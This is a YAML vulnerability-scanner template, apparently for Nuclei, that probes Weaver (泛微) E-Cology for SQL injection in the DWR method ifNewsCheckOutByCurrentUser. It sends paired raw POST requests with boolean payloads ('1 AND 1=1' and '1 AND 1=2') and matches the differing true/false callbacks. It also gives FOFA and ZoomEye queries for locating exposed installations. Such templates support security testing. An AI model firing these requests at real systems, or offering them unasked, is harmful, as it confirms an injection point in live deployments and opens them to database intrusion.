http:
    - matchers:
        - part: body_1
          type: word
          words:
            - dwr.engine._remoteHandleCallback('0','0',true)
        - part: body_2
          type: word
          words:
            - dwr.engine._remoteHandleCallback('0','0',false)
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
          Host: {{Hostname}}
          Content-Type: text/plain
          Accept-Encoding: gzip

          callCount=1
          page=
          httpSessionId=
          scriptSessionId=
          c0-scriptName=DocDwrUtil
          c0-methodName=ifNewsCheckOutByCurrentUser
          c0-id=0
          c0-param0=string:1 AND 1=1
          c0-param1=string:1
          batchId=0
        - |
          POST /dwr/call/plaincall/CptDwrUtil.ifNewsCheckOutByCurrentUser.dwr HTTP/1.1
          Host: {{Hostname}}
          Content-Type: text/plain
          Accept-Encoding: gzip

          callCount=1
          page=
          httpSessionId=
          scriptSessionId=
          c0-scriptName=DocDwrUtil
          c0-methodName=ifNewsCheckOutByCurrentUser
          c0-id=0
          c0-param0=string:1 AND 1=2
          c0-param1=string:1
          batchId=0
id: ecology-ifnewscheckoutbycurrentuser-dwr-sqli
info:
    author: SleepingBag945
    description: |-
        FOFA: app="泛微-EOffice"
        ZoomEye: app:"泛微移动办公平台e-mobile"
    name: 泛微 E-Cology ifnewscheckoutbycurrentuser.dwr SQL 注入
    severity: high
    tags:
        - ecology
        - e-mobile
        - e-office
        - e-cology
        - 泛微-EOffice
        - 泛微 e-cology
